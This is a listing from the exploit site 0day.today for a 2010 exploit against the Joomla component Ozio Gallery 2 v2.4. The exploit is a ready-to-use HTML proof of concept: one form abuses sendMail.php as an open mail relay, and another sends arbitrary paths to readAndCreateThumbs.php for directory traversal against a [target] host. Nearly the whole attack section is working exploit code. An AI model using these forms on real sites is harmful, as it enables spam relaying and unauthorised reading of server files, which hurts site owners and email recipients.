[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_oziogallery2 Multiple Vulnerabilities

Author
jdc
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12777
Category
web applications
Date add
18-06-2010
Platform
php
==========================================================
Joomla Component com_oziogallery2 Multiple Vulnerabilities
==========================================================


<!--
# Exploit Title: Joomla Component Ozio Gallery 2 Multiple Vulnerabilities
# Date: 28 May 2010
# Author: jdc
# Software Link:
http://extensions.joomla.org/extensions/photos-a-images/photo-flash-gallery/4883
# Version: 2.4
# Tested on: PHP5, MySQL5
-->
 
<h2>Ozio Gallery 2</h2>
<h3>v 2.4</h3>
 
<h4>Open Mail Relay:</h4>
 
<form method="post"
action="http://[target]/components/com_oziogallery2/imagin/scripts_ralcr/others/sendMail.php">
<label for="to">To:</label><input id="to" name="to" type="text" /><br />
<label for="from">From:</label><input id="from" name="from" type="text"
/><br />
<label for="subject">Subject:</label><input id="subject" name="subject"
type="text" /><br />
<label for="message">Message:</label><textarea id="message"
name="message"></textarea><br />
<input type="submit" value="Send"/>
</form>
 
 
<h4>Directory Traversal:</h4>
 
<form method="post"
action="http://[target]/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/readAndCreateThumbs.php">
<label for="path">path:</label><input id="path" name="path" type="text"
/><br />
<input type="submit" value="Send"/>
</form>



#  0day.today [2024-12-23]  #